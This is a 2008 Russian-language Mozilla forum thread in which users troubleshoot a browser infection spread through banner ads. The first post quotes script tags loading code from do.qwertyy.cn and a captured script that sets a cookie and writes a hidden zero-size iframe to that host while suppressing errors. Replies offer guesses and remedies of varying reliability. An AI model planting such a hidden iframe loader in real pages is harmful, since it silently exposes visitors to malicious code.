Полезная информация

Многие проблемы быстрее решаются поиском по форуму и чтением FAQ, чем созданием новой темы и томительным ожиданием ответа.

№116-11-2008 02:43:26

Dragooon
Участник
 
Группа: Members
Откуда: Киев
Зарегистрирован: 16-11-2008
Сообщений: 3
UA: Firefox 3.0
Веб-сайт

подцепил какую-то заразу

Это какойто Браузерный ЕКСПЛОЙТ.

появляется на разных страничках постоянно

<script language="javascript" SRC="http://do.qwertyy.cn/do.js"></script>
<script language="javascript" SRC="http://do.qwertyy.cn/do.htm"></script>
<script language="javascript" SRC="http://do.qwertyy.cn/gg.htm"></script>

вот такая фигня. NOD32 в системе ничего не находит. Только когда эта байда запускается, вставляется в страничку браузера (Firefox 3.0.3)
нод начинает ругатся.

в Opera покамись незаметил эту штуку.

внутри файла лежит вот такой код:

document.writeln("<script>");
document.writeln("function oK_Begin(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=0 height=0 src=\"http://do.qwertyy.cn/do.htm\"><\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("oK_Begin();");
document.writeln("<\/script>");
document.writeln("<script>window.onerror=function(){return true;}<\/script>")

Эта штука живёт в кукисах  - тобиш чистите куки
Открываем кукисы браузера и чистим все с названием Cookie1

Нашол вроде откуда лезит эта фигня. Ко мне на комп она попадает через БАННЕРЫ. после чистки кукисов первая зловредная кука с адресом banner.kiev.ua

Заражаюсь сразуже кактолько захожу фаерфоксом на какойто сайт с банерами УБС. Далее если кука висит она автоматом запускается если открываеш какойнибудь другой сайт.

Избавится от банеров сложно - сделовательно ждём обновлений фаерфокса... Кстате в Firefox версии 3,0,4 эта дыра присуцтвует.

Отсутствует

 

№216-11-2008 06:24:34

fredperry
 
Группа: Guest
UA: Firefox 3.0

Re: подцепил какую-то заразу

чищу кукисы и ничего не происходит.

всё так же лезет qwertyy

 

№316-11-2008 08:52:21

ZohaN
 
Группа: Guest
UA: Foxware 0.0

Re: подцепил какую-то заразу

у меня небыло такого.. пока :)

 

№416-11-2008 10:07:22

Shutnik
Happy Arch Linux User
 
Группа: Extensions
Откуда: Tyumen ✈ Dnipropetrovsk
Зарегистрирован: 12-11-2005
Сообщений: 3785
UA: Iceweasel 3.0
Веб-сайт

Re: подцепил какую-то заразу

в этом скрипте нет никакого эксплоита, он просто ворует куки.
на каких страницах это проявляется?


Life's emblem here, in youth and vernal bloom,
But reason's finger pointing at the...

Отсутствует

 

№516-11-2008 10:25:12

Const2008
 
Группа: Guest
UA: IE 6.0

Re: подцепил какую-то заразу

Засада!
Он и оперу и мозилу попал у меня.
Мозила как то предохраняеться, путем блокировки страницы, а опера тупо грузит его.

Короче только explorer пока в живых остался.
Кукисы и там и там почистил, кэш также очистел. Непомогает :(
Что делать, кто знает?

 

№616-11-2008 10:35:17

Shutnik
Happy Arch Linux User
 
Группа: Extensions
Откуда: Tyumen ✈ Dnipropetrovsk
Зарегистрирован: 12-11-2005
Сообщений: 3785
UA: Iceweasel 3.0
Веб-сайт

Re: подцепил какую-то заразу

Что делать, кто знает?

лечиться от вирусов, браузеры тут не при чём


Life's emblem here, in youth and vernal bloom,
But reason's finger pointing at the...

Отсутствует

 

№716-11-2008 10:39:50

sks23
 
Группа: Guest
UA: Chrome 0.4

Re: подцепил какую-то заразу

Это ARP spoofing.
http://fahryhadikusumo.wordpress.com/tag/arp-spoofing-solution/
http://forum.kaspersky.com/index.php?showtopic=58061&st=60
http://forum.kaspersky.com/index.php?showtopic=87668&st=60&start=60

 

№816-11-2008 11:33:49

!gOR
Участник
 
Группа: Members
Откуда: Беларусь
Зарегистрирован: 22-03-2006
Сообщений: 80
UA: Firefox 3.0

Re: подцепил какую-то заразу

Если я пользуюсь ФФ+noScript, я заразиться не могу? Ведь не разрешаю скриптам выполняться на незнакомых сайтах?

Отсутствует

 

№916-11-2008 11:45:47

Vet0489
 
Группа: Guest
UA: IE 7.0

Re: подцепил какую-то заразу

народ....тоже самое.....сначала подхвотил вот эту фигню....   точнее зашел случайно на нее когда чрез эксплорер лазел пришлось винду пеерставить......переставил поставил avast и теперь заходя на сайт любой выскакивает окошко от avast о том что он заблакикровал соединение с этим сайтом.....кто нибудь знает что делать то ?

 

№1016-11-2008 14:32:51

lump
 
Группа: Guest
UA: Firefox 3.0

Re: подцепил какую-то заразу

а кто нить знает где можно закачать архивчик со свежими и опасными тараканами? гугль находит только DOSовское старьё. всёравно скоро винду сносить, апгрейд мамы-проца-оперативки :)

 

№1116-11-2008 17:53:57

Dragooon
Участник
 
Группа: Members
Откуда: Киев
Зарегистрирован: 16-11-2008
Сообщений: 3
UA: Firefox 3.0
Веб-сайт

Re: подцепил какую-то заразу

Заблокировал эти 2 IP

122.224.4.140
222.216.28.25

непомогает!

Отредактировано Dragooon (16-11-2008 18:23:40)

Отсутствует

 

№1216-11-2008 18:37:17

George Yves
Help you I can
 
Группа: Extensions
Откуда: Полоцк, Беларусь
Зарегистрирован: 22-05-2008
Сообщений: 1886
UA: Firefox 3.0

Re: подцепил какую-то заразу

Shutnik пишет

в этом скрипте нет никакого эксплоита, он просто ворует куки.

А что говорит ваш антишпион, уважаемый Dragooon?


May the FOSS be with you!

Отсутствует

 

№1316-11-2008 18:40:32

Dragooon
Участник
 
Группа: Members
Откуда: Киев
Зарегистрирован: 16-11-2008
Сообщений: 3
UA: Firefox 3.0
Веб-сайт

Re: подцепил какую-то заразу

George Yves - молчит он. на кампе заразы явно нету. Заражен какой то компьютер в сети (баннерная сеть) и между например двумя ПК появляется некий зараженный посредник который модифицирует трафик добавляя в код который записывает куку в браузер после чего кука вставляет ифрейм.

Проблему нужно искать в сети. Думаю этот прикол не скоро найдут.

Shutnik
- в данном коде эксплоита нету. Но тогда КАКИМ образом експлоит попадает на комп через браузер Firefox? ведь в опере у меня эта байда не вылазит и кука не пишется!

появляется на ресурсах где есть баннера
banner[dot]kiev[dot]ua
gala[dot]net

Отредактировано Dragooon (16-11-2008 18:49:00)

Отсутствует

 

№1417-11-2008 06:19:50

Erik
Рупор народной культуры
 
Группа: Members
Откуда: Бавария, Бюргерстан
Зарегистрирован: 25-09-2006
Сообщений: 1341
UA: Konqueror 4.1

Re: подцепил какую-то заразу

Dragooon, а не проще ли адблоком вырезать эти баннеры нафиг?

P.S. выражаю сочувствие по поводу заразы и все такое...

Отредактировано Erik (17-11-2008 06:20:18)

Отсутствует

 

№1517-11-2008 14:52:39

Shutnik
Happy Arch Linux User
 
Группа: Extensions
Откуда: Tyumen ✈ Dnipropetrovsk
Зарегистрирован: 12-11-2005
Сообщений: 3785
UA: Iceweasel 3.0
Веб-сайт

Re: подцепил какую-то заразу

Dragooon пишет

Но тогда КАКИМ образом експлоит попадает на комп через браузер Firefox?

он уже давно попал в него. рекомендую для начала попробовать новый профиль и перестановку браузера


Life's emblem here, in youth and vernal bloom,
But reason's finger pointing at the...

Отсутствует

 

Board footer

Powered by PunBB
Modified by Mozilla Russia
Copyright © 2004–2020 Mozilla Russia GitHub mark
Язык отображения форума: [Русский] [English]